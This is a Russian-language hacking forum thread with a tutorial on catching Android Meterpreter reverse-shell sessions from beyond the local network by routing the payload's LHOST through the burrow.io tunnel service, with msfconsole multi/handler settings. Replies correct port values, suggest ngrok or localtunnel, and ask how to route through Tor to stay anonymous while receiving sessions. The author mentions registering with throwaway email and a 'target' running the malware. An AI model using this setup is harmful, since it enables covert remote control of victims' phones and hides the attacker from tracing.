Статья Получение Meterpreter за локальной сетью.

  • Автор темы Автор темы Rollly
  • Дата начала Дата начала
  • Теги Теги
    nat
Доброго времени суток мои юные хацкеры, и не только. Сегодня я вам поведаю об одном из множества способов, получения сессии meterpreter за локальной сетью т.е мы сможем получить её не только в локальной сети. Приступим.
Переходим на сайт , и проходим регистрацию. В этом сервисе есть большой минус. Нам даётя 7 дней триала. Но не проблема создать новый аккаунт. Для своей же безопасности регистрируем наш аккаунт на левую почту.
Хотя мы ничего нарушать не будем, так ведь? :)
После регистрации, нам предоставляют возможность выбора 2-ух опций, выбираем "Forward a TCP port to your localhost".
Выделение_001.png

Видим меню выбора "Localhost port", выбираем Custom "TCP port". Теперь нам нужно создать "Security Group", и нажимаем "Click here to create one".
Выделение_002.png

Добавляем группу, путём нажатия на кнопку "+add", и подтверждаем "Create security group", в поле "ext: 22, указываем порт на свой выбор, завершаем нашу настройку нажатием "Create tunel".
Выделение_003.png

Нас перенаправляет на страницу нашего тунеля, тут мы можем видеть все команды для запуска нашего тунеля.
Выделение_007.png

Теперь нам предстоит запустить сам тунель. Копируем Curl ссылку, и запускаем её в терминале. Наш тунель запущен. Осталась последняя часть.
Выделение_008.png

Создание вредной нагрузки.
Нам дается ссылка вида: io.burrow.io:4445 У каждого может быть разный порт. Вместо нашего локального ip, в полезной нагрузке, мы будем указывать lhost=io.burrow.io, соответствено lport=7890. Создали.
Переходим к созданию листенера. Запускаем msfconsole. Выполняем команду "use multi/handler", и указываем вид нашей нагрузки, в моём случае это android/meterpreter/reverse_tcp.
Самое главное. Чтобы нам прилетела сессия, указываем set lhost=127.0.0.1, и порт, я указал 7890. Exploit.
Выделение_009.png

Когда наша цель запустит вредонос, нам прилетит сессия. Тоже самое вы можете повторить и в Termux. Спасибо за внимание.
 

Вложения

  • Выделение_009.png
    Выделение_009.png
    39,9 КБ · Просмотры: 785
localtunel для постоянного DNS тоже нормальный инструмент. И в добавок он бесплатен.
В данной теме описан метод использования сервиса burrow, с другими не знаком. Да и никому не мешает через 7 дней создать новый аккаунт за 2 минуты. И не думаю что кому то понадобится этот сервис на долгое время.
 
  • Нравится
Реакции: Литиум и n01n02h
"Создание вредной нагрузки.
Нам дается ссылка вида: io.burrow.io:4445 У каждого может быть разный порт. Вместо нашего локального ip, в полезной нагрузке, мы будем указывать lhost=io.burrow.io, соответствено lport=7890. Создали.
Переходим к созданию листенера. Запускаем msfconsole. Выполняем команду "use multi/handler", и указываем вид нашей нагрузки, в моём случае это android/meterpreter/reverse_tcp.
Самое главное. Чтобы нам прилетела сессия, указываем set lhost=127.0.0.1, и порт, я указал 7890. Exploit."
В полезной нагрузке надо ведь указывать порт 4445, а уже в листенере 7890? По моему у вас опечатка.
 
  • Нравится
Реакции: Tihon49
"Создание вредной нагрузки.
Нам дается ссылка вида: io.burrow.io:4445 У каждого может быть разный порт. Вместо нашего локального ip, в полезной нагрузке, мы будем указывать lhost=io.burrow.io, соответствено lport=7890. Создали.
Переходим к созданию листенера. Запускаем msfconsole. Выполняем команду "use multi/handler", и указываем вид нашей нагрузки, в моём случае это android/meterpreter/reverse_tcp.
Самое главное. Чтобы нам прилетела сессия, указываем set lhost=127.0.0.1, и порт, я указал 7890. Exploit."
В полезной нагрузке надо ведь указывать порт 4445, а уже в листенере 7890? По моему у вас опечатка.
Какой порт укажешь при создании нагрузки, туда и будет отстукивать посетитель..)
 
  • Нравится
Реакции: Vertigo и valerian38
"Создание вредной нагрузки.
Нам дается ссылка вида: io.burrow.io:4445 У каждого может быть разный порт. Вместо нашего локального ip, в полезной нагрузке, мы будем указывать lhost=io.burrow.io, соответствено lport=7890. Создали.
Переходим к созданию листенера. Запускаем msfconsole. Выполняем команду "use multi/handler", и указываем вид нашей нагрузки, в моём случае это android/meterpreter/reverse_tcp.
Самое главное. Чтобы нам прилетела сессия, указываем set lhost=127.0.0.1, и порт, я указал 7890. Exploit."
В полезной нагрузке надо ведь указывать порт 4445, а уже в листенере 7890? По моему у вас опечатка.
Просто скриншот уже позже сделал, на скриншоте Нам дается ссылка вида: io.burrow.io:40333, io.burrow.io пишем при создании нагрузки, и порт соответственно : 40333 а при запуске листенера, пишем порт который мы указали при настройке туннеля, это set lhost localhost, set lport 7890 - этот порт я указал при создании туннеля. Надеюсь понятно объяснил.
 
  • Нравится
Реакции: Tihon49
Народ эта штука по типу noip?
в роутере надо открывать порты?
и localtunel лучше?
 
Тот же Ngrok он бесплатный ,нужно только регистрацию пройти.
 
  • Нравится
Реакции: NSNL.dll
Здравствуйте, подскажите возможно ли пустить трафик от burrow io через тор, к своей машине?Как реализовать?Спасибо.
 
Метод, указанный вами работает за пределами локальной сети? Я так понимаю, что тогда незачем использовать сервис burrow io, если ip серый?
что для вас значит за пределами локальной сети? можно ли так прокинуть сессию на удалённую нашину или что именно.
 
что для вас значит за пределами локальной сети? можно ли так прокинуть сессию на удалённую нашину или что именно.
В том и дело, что просто прокинуть сессию на удаленную машину не выйдет, т.к ip за натом провайдера. Поэтому я и думаю, что необходимо использование borrow ip(или того же ngrok).Задача стоит скрыть свой ip от сервера borrow io, т.е чтобы я подключался к туннелю через сеть тор.(получая сессию) Надеюсь понятно выразился. Может быть я в чем-то ошибаюсь?Возможно есть другое решение как анонимно получить сессию с серым ip? Спасибо.
 
  • Нравится
Реакции: hjkjkjhhj и Air7771
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!